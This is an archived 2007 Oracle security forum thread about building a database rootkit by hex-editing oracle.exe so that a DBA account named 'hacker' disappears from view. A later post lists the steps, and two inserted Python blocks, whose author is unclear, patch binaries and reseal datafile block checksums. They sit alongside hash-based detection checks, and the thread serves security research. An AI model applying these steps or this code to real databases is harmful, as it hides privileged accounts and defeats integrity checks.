Pete Finnigan's Oracle Security Forum (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
(Message started by: Pete Finnigan on May 18th, 2007, 8:29am)

Title: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 18th, 2007, 8:29am
To all,

I read the Oracle Rootkit whitepaper of Alex:

Alex shows the way to make a rootkit: replace all sys.user$ with sys.aser$ in a binary file.

If you already know that, please help me answer two questions:
1. Which binary file does Alex mention? and
2. How can we modify the binary without breaking the data integrity of Oracle?

I replaced all sys.user with sys.aser in the datafile of the SYSTEM tablespace, but after that I can't OPEN my database.

Thanks.
Title: Re: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 18th, 2007, 1:58pm
Hi

You must modify the binary file oracle.exe (don't forget to save a copy) with a hex editor (e.g. UltraEdit). The file oracle.exe contains the select statements retrieving data from sys.user$. If you replace sys.user$ with sys.aser$, Oracle retrieves data from there.

If you modify the datafile of the SYSTEM tablespace, the block checksums are corrupted and Oracle will not start.

I hope this is sufficient.

Regards

Alex

--
Red-Database-Security GmbH
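The patch Alex describes, and the check a defender would run against it, as an added example. This is my code, not from the thread, the whitepaper or Oracle: the `SAMPLE_BINARY` bytes are constructed to stand in for a few bytes of oracle.exe, the SQL literals in it are made up, and the `sys.xxxx$` pattern used for the scan is an assumption about what a tampered literal looks like. The security-relevant constraint is that the replacement is exactly as long as the original, because a compiled binary addresses its strings by fixed offset.

```python
import hashlib
import re
import shutil
from pathlib import Path

# Constructed stand-in for a slice of oracle.exe: two embedded SQL strings that
# reference sys.user$, surrounded by junk bytes. Not taken from a real binary.
SAMPLE_BINARY = (
    b"\x4d\x5a\x90\x00" + b"\x00" * 12
    + b"select user#,type# from sys.user$ where name=:1\x00"
    + b"\xcc" * 8
    + b"select password from sys.user$ where user#=:1\x00"
    + b"\x00" * 16
)

OLD = b"sys.user$"
NEW = b"sys.aser$"


def patch_same_length(data: bytes, old: bytes, new: bytes) -> tuple[bytes, int]:
    """Replace every occurrence of `old` with `new` in an in-memory binary image.

    String literals sit at fixed offsets inside a compiled binary, so the
    replacement must have exactly the same length; a longer or shorter string
    shifts everything after it and destroys the executable instead of patching it.
    """
    if len(old) != len(new):
        raise ValueError(f"length mismatch: {len(old)} != {len(new)}")
    count = data.count(old)
    return data.replace(old, new), count


def patch_file(path: Path, old: bytes, new: bytes) -> int:
    """Patch `path` in place after saving an untouched `.orig` copy beside it."""
    backup = path.with_suffix(path.suffix + ".orig")
    shutil.copy2(path, backup)            # the copy is the rollback and the hashing baseline
    patched, count = patch_same_length(path.read_bytes(), old, new)
    path.write_bytes(patched)
    return count


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Detection side. A one-byte edit still changes the whole-file hash, so the
# first check is a hash compare against a known-good copy. The second check
# inventories the sys.xxxx$ literals (pattern is an assumption) and reports
# names that exist in the live binary but not in the known-good one.
TABLE_REF = re.compile(rb"sys\.[a-z]{4}\$")


def find_table_refs(data: bytes) -> dict[bytes, list[int]]:
    """Map each sys.xxxx$ literal to the offsets where it occurs."""
    refs: dict[bytes, list[int]] = {}
    for m in TABLE_REF.finditer(data):
        refs.setdefault(m.group(0), []).append(m.start())
    return refs


def diff_table_refs(good: bytes, live: bytes) -> dict[bytes, list[int]]:
    """Literals present in the live binary but absent from the known-good copy."""
    baseline = find_table_refs(good)
    return {k: v for k, v in find_table_refs(live).items() if k not in baseline}


if __name__ == "__main__":
    patched, n = patch_same_length(SAMPLE_BINARY, OLD, NEW)
    print(f"replaced {n} occurrence(s); size unchanged: {len(patched) == len(SAMPLE_BINARY)}")
    print(f"sha256 before {sha256(SAMPLE_BINARY)[:16]}... after {sha256(patched)[:16]}...")
    print("literals not in the known-good image:", diff_table_refs(SAMPLE_BINARY, patched))
```

`patch_file` is the hex-editor step with the backup Alex insists on; `diff_table_refs` is the check to run on a suspect ORACLE_HOME against a clean install or vendor media, since a same-length literal swap leaves file size, timestamps and every other string intact and only the hash and the literal inventory give it away.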

Title: Re: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 20th, 2007, 9:46pm
Hi,

As Alex says, you must modify the binaries, not the data files. Although, that said, I can (using thought experiments) see ways to create rootkits by modifying data blocks. To modify a data block, as Alex says, you must at least correct the checksums to make the block pass load checks.

Also of interest is a paper on my internals page - http://www.petefinnigan.com/other.htm - that shows how to modify the database bootstrap$ - http://www.vijaymukhi.com/oracled.doc - (it's an MS Word doc - it's not mine - beware of opening Word docs. I have opened it and it was fine, but you should save and virus-check it, then open it locally if you are worried). This is also an interesting post and gives me interesting ideas in the area of rootkits.

cheers

Pete
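Pete's point that a data-block edit has to leave the block with a valid checksum, as an added example (my code, not from the thread or from Oracle). It models a block with a 16-bit checksum stored in the header and computed as the XOR of every 16-bit word with the checksum field taken as zero, which is how Oracle's block checksum is generally described; the 8 KB block size, the checksum field at offset 16 and the block contents are assumptions, and the block is constructed here rather than dumped from a database, so verify the layout against a real block dump before trusting any of it.

```python
import struct

BLOCK_SIZE = 8192      # assumption: 8 KB blocks
CHKVAL_OFFSET = 16     # assumption: 2-byte checksum field at this header offset


def block_checksum(block: bytes) -> int:
    """XOR of all 16-bit little-endian words, with the checksum word itself skipped.

    Skipping the word is the same as computing with the field zeroed, so the
    function can be applied to a sealed or an unsealed block alike.
    """
    if len(block) % 2:
        raise ValueError("block length must be even")
    words = struct.unpack(f"<{len(block) // 2}H", block)
    chk = 0
    for i, w in enumerate(words):
        if i == CHKVAL_OFFSET // 2:
            continue
        chk ^= w
    return chk


def stored_checksum(block: bytes) -> int:
    return struct.unpack_from("<H", block, CHKVAL_OFFSET)[0]


def verify_block(block: bytes) -> bool:
    """The load check a database would apply before trusting the block."""
    return stored_checksum(block) == block_checksum(block)


def seal_block(block: bytes) -> bytes:
    """Return a copy with the checksum field recomputed over the current contents."""
    buf = bytearray(block)
    struct.pack_into("<H", buf, CHKVAL_OFFSET, block_checksum(block))
    return bytes(buf)


def patch_block(block: bytes, old: bytes, new: bytes, reseal: bool = True) -> bytes:
    """Same-length literal swap inside a block; reseal=False is the naive hex edit."""
    if len(old) != len(new):
        raise ValueError("replacement must keep the block layout, so lengths must match")
    patched = block.replace(old, new)
    return seal_block(patched) if reseal else patched


def make_sample_block() -> bytes:
    """Constructed block: a few header bytes and one row piece carrying the literal."""
    buf = bytearray(BLOCK_SIZE)
    buf[0:4] = b"\x06\xa2\x00\x00"                     # constructed header bytes, not a real layout
    struct.pack_into("<I", buf, 4, 0x00400081)          # constructed block address
    row = b"\x2c\x00\x02\x06HACKER\x09sys.user$"        # constructed row piece, literal occurs once
    buf[4096:4096 + len(row)] = row
    return seal_block(bytes(buf))


if __name__ == "__main__":
    blk = make_sample_block()
    naive = patch_block(blk, b"user$", b"aser$", reseal=False)
    fixed = patch_block(blk, b"user$", b"aser$")
    print("original passes:", verify_block(blk))
    print("hex-edited block passes:", verify_block(naive))
    print("edited and resealed block passes:", verify_block(fixed))
```

The naive edit is what the first poster did to the SYSTEM datafile: the bytes change, the stored checksum does not, and the load check fails. Two caveats for the defender's side: an XOR checksum only catches an edit whose word-wise delta is non-zero, so two identical single-byte edits at the same byte parity cancel each other, and an attacker who can reseal the block passes the check anyway. It is a corruption check, not an integrity control; detecting this class of change needs a comparison against a trusted copy or hash of the file.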

Title: Re: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 21st, 2007, 7:17am
Hi Alex,

I followed the steps in your whitepaper, but it seems that I'm not lucky:
1. Create a user hacker with DBA privileges
2. Create a copy of the table sys.user$
3. Drop user hacker from sys.user$
4. Shutdown database
5. Patch binary file
6. Start database

I replaced all sys.user$ with sys.aser$ in the oracle.exe file, but I can't log in successfully with the dropped user.

I tested on the following versions: 9.2.0.1, 10.2.0.1 and 10.2.0.3.

Do I need to take any additional step?

Thanks, Alex.

Thanks, Pete, for the good paper.

Regards.